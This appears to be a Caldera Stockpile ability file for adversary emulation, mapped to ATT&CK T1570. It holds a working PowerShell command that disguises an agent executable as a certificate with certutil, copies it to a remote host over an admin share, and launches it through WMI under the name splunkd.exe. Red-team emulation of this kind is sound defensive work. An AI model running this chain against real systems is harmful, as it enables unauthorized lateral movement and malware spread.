- tactic: lateral-movement
  technique_name: Lateral Tool Transfer
  technique_id: T1570
  name: Lateral Movement - Certutil
  description: Uses CertUtil as a LoL technique to move the .exe agent as a certificate
    using windows-signed binaries
  executors:
  - name: psh
    platform: windows
    command: 'certutil -encode #{location} C:\users\public\com.crt | out-null;

      invoke-command #{remote.host.fqdn} -scriptblock { certutil -decode \\#{local.host.fqdn}\c$\users\public\com.crt
      #{location}; invoke-wmimethod -computername . -class win32_process -name Create
      -argumentlist "C:\users\public\splunkd.exe -server #{server} -group red" }

      '
    code: null
    language: null
    build_target: null
    payloads: []
    uploads: []
    timeout: 60
    parsers: []
    cleanup:
    - rm C:\users\public\com.crt
    variations: []
    additional_info: {}
  requirements:
  - module: plugins.stockpile.app.requirements.not_exists
    relationship_match:
    - source: remote.host.fqdn
      edge: has_agent_copy
  - module: plugins.stockpile.app.requirements.no_backwards_movement
    relationship_match:
    - source: remote.host.fqdn
  privilege: ''
  repeatable: false
  buckets: []
  additional_info:
    cleanup: '[]'
  access: {}
  singleton: true
  plugin: stockpile
  delete_payload: true
  id: 96d3c175-5e58-424c-8350-d7514b28a075
